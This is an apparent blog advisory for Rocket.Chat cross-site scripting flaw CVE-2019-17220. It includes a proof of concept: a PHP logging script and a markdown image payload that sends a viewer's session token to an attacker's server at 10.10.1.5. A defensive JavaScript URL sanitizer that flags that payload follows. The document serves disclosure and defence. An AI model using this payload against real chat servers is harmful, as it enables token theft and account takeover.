Wednesday, October 2, 2019

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

As I found out, the service has a security problem that will lead to the disclosure of user information.

Packet Storm
Mitre CVE
NIST
Exploit-DB



# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server 


<?php
// Appends whatever arrives in the "leet" query parameter to logs.txt
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send the payload containing your web server URL


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. The token is written to logs.txt once the target has viewed your message.
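As an added defensive example (not code from this advisory or from Rocket.Chat), the check below vets markdown image URLs before they are rendered and flags messages that carry the payload shape shown above. The function names and the sample messages are assumptions for illustration.

```javascript
// Added example, not Rocket.Chat code: reject image URLs that contain
// template delimiters or backticks, which the advisory's payload depends on,
// and allow only plain http(s) URLs without embedded credentials.
const FORBIDDEN = /[`{}$]/;

// Returns the normalized URL string if it is safe to render, otherwise null.
function sanitizeImageUrl(raw) {
  if (typeof raw !== "string" || FORBIDDEN.test(raw)) return null;
  let url;
  try {
    url = new URL(raw); // throws on relative or malformed input
  } catch (e) {
    return null;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  if (url.username || url.password) return null;
  return url.href;
}

// Markdown image syntax: ![alt](url)
const IMAGE_RE = /!\[[^\]]*\]\(([^)]*)\)/g;

// Scans one message body and returns the image URLs that failed vetting;
// this is the signal a pre-send filter or a detection rule would act on.
function findSuspiciousImages(text) {
  const bad = [];
  for (const m of text.matchAll(IMAGE_RE)) {
    if (sanitizeImageUrl(m[1]) === null) bad.push(m[1]);
  }
  return bad;
}

// Constructed sample messages (not real chat data).
const SAMPLES = [
  "![title](http://10.10.1.5/l33t.php?leet=+`{}token`)", // payload shape from the advisory
  "![logo](https://example.com/logo.png)",                 // benign image
  "![x](ftp://example.com/x.png)",                          // disallowed scheme
];
```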
